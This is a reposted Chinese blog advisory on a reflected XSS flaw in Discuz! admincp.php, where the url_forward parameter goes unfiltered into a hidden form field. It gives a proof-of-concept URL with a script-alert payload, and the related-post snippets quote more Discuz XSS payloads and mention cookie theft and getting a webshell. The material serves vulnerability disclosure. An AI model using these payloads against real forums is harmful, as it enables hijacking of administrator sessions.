Discuz! admincp.php xss bug

最新推荐文章于 2024-06-29 15:03:37 发布
最新推荐文章于 2024-06-29 15:03:37 发布
阅读量107 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34023863/article/details/85192390
版权 
Discuz! admincp.php xss bug

author: 80vul-B
team:[url]http://www.80vul.com[/url]

漏洞存在于文件admin/login.inc.php里$url_forward没有被过滤导致xss漏洞:

		<input type="hidden" name="url_forward" value="$url_forward">

poc:
[url]http://127.0.0.1/discuz/admincp.php?url_forward=%22%3E%3Cscript%3Ealert[/url](/xss/)%3C/script%3E
[管理员或版主前台登录,但未登录后台时触发]
weixin_34023863
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Discuz x2 XSS漏洞
pygain的博客
10-31 3661
Discuz x2 cms 针对拥有编辑权限的管理员存在储存型xss,构造合理的payload可拿到管理员cookie payload: [align="onmouseover="alert(1)];
discuz xss拿shell
Coisini的博客
05-26 1440
Discuz XSS得webshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...
Discuz原码分析(一)admincp.php
Black_c的专栏
01-08 3403
 php/*    [Discuz!] (C)2001-2007 Comsenz Inc.    This is NOT a freeware, use is subject to license terms    $Id: admincp.php 10318 2007-08-25 12:26:40Z heyond $*/define(IN_ADMINCP, TRUE);define(
Discuz! 路径信息泄露 bug
weixin_34013044的博客
11-16 284
Discuz! 路径信息泄露 bugauthor: 80vul-Ateam:[url]http://www.80vul.com[/url]一 分析目录\uc_client\data\cache\,\forumdata\cache等下面的文件里对如:$_CACHE['settings'] = array (  'accessemail' =&gt; '',  'censoremail' =&gt; ...
discuz7.0 _post.php xss跨站漏洞-学习笔记
小龙在线
08-17 778
漏洞名称 discuz7.0 _post.php xss跨站漏洞 发布时间 2014-06-02 漏洞分类 反射型xss漏洞 缺陷代码 没有对所有参数进行过滤。 if($action == 'reply') { $addfeedcheck = $customaddfeed & 4 ? 'checked="checked"': ''; } elseif(!empty($special) && $action != 'reply') { $addfeedcheck = $
Discuz! 7.2的一个XSS漏洞
软件质量优化
01-26 3511
<br /> <br />Discuz! 7.2的一个XSS漏洞<br /> <br />http://bbs.example.com/vote/showtome.php?tid=6>"><script>alert(3580839)</script><br /> <br />在投票模块中出现的<br /> <br />有空要下载7.2的源码研究研究<br /> <br /> <br /> 
php config手册,Discuz! X1 config_global.php配置注解手册
weixin_35785909的博客
03-28 595
$_config = array();$_config['db'][1]['dbhost']='localhost';//服务器地址$_config['db'][1]['dbuser']='root';//用户$_config['db'][1]['dbpw']='root';//密码$_config['db'][1]['dbcharset']='gbk';//字符集$_config...
discuz! admin\runwizard.inc.php get-webshell bug
weixin_33805557的博客
11-16 233
iscuz! admin\runwizard.inc.php get-webshell bugauthor: 80vul-Ateam:[url]http://www.80vul.com[/url]由于Discuz!的admin\runwizard.inc.php里saverunwizardhistory()写文件操作没有限制导致执行代码漏洞.一 分析在文件admin\runwizard.inc.p...
xss防御补丁_DZ_20151208补丁分析_SSRF&XSS
weixin_39684898的博客
12-22 209
DZ_20151208补丁分析_SSRF&XSSauthor:ModNar@0keeTeam漏洞分析:我们先来diff看看补丁20151208相对20150609都改了啥:*source/admincp/admincp_checktools.phpIM图片库命令执行(需登录后台)*source/class/helper/helper_form.phphttp://w...
Discuz! F.I.R
12-08
1. **核心程序文件**:如index.phpadmincp_index.php等,是论坛系统的核心运行文件,处理用户的请求和后台管理操作。 2. **模板文件**(templates):包含HTML、CSS和JavaScript,定义了论坛的外观和交互。F.I.R...
首页论坛热点自定义插件 for Discuz! 7.2 GBK.rar
07-14
templates\default\admincp.menu.lang.php templates\default\admincp.lang.php templates\default\admincp.msg.lang.php 2.把附件解压以后覆盖即可 使用说明: 1.进入后台 2.点击 ‘帖子’ 标签 3.会在左面...
在线文件管理插件 for Discuz!7.2 GBK.rar
07-14
功能很简单,允许管理员在后台直接对论坛文件进行修改。 安装方法: 请把editprogram.inc.php上传到admin目录中,把...名称为“编辑文件”,URL为“http://www.yoursite.com/admincp.php?action=editprogram”
Discuz!数据字典X3.docx
01-14
Discuz! X3 数据字典提供了关于其核心数据库结构的详细信息,涵盖了多个关键表及其字段,这些表用于管理论坛的后台操作、用户权限、管理组功能等。以下是对这些表的详细解释: 1. pre_common_admincp_cmenu:后台...
论坛FTP——BBSFTP插件 for Discuz!7.0 GBK.rar
07-14
如果您想自己随意书写 SQL 升级语句, 需要将 config.inc.php 当中的 $admincp['runquery'] 设置修改为 1。 6。进后台设置FTP中心的参数。 (参考附件) 升级安装: 只要重新上传文件覆盖即可。 备份FTP中心...
百度ueditor如何修改图片的保存位置
snow_love_xia的博客
06-28 346
编辑器的保存图片是设置有默认规则的,但是做项目一般也是有图片固定的保存路径,那就需要修改编辑器的图片保存路径,很简单,在ueditor.php配置中修改即可
php开发的系统/软件如何实现闭源?
最新发布
无知人生,记录点滴
06-29 456
看到CPanel的介绍“对国际主机市场了解的朋友一定听说过cPanel,它是世界上功能强大,容易使用,因而比较受用户欢迎的虚拟主机控制系统。cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及。每种工具都有其优势和局限性,选择哪一种取决于你的具体需求、目标平台和对PHP特性的支持要求。想到这个问题的起因是想找一款更好用的服务器管理软件,比较常见的就是 混淆代码、二进制部署,以 PHP 开发且性质为闭源软件。以 PHP 开发且性质为闭源软件。
基于公有云部署wordpress
weixin_60250117的博客
06-28 806
wordpress工作原理:当用户通过浏览器访问LNMP架构的网站时,Nginx服务器会接收到用户的请求。Nginx会根据请求的URL和配置进行匹配,检测请求的Web文件是静态还是动态。 静态页面请求:如果请求的是静态HTML页面,Nginx会直接处理并响应给客户端。 动态页面请求:如果请求的是动态PHP页面(或其他脚本语言),Nginx会将请求发送给后端的PHP模块或CGI。PHP解释器将动态网页解析为静态的HTML网页,然后返回给Nginx。Nginx再将解析后的HTML静态网页结果返回给客户端。
discuz config_global.php,Discuz! X config_global.php配置注释教程
05-24
以下是Discuz! X的config_global.php配置文件的注释教程: ```php <?php /** * Discuz! X - 配置文件 * * 版权所有 (C) 2001-2019 Comsenz Inc. * This is NOT a freeware, use is subject to license terms *...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值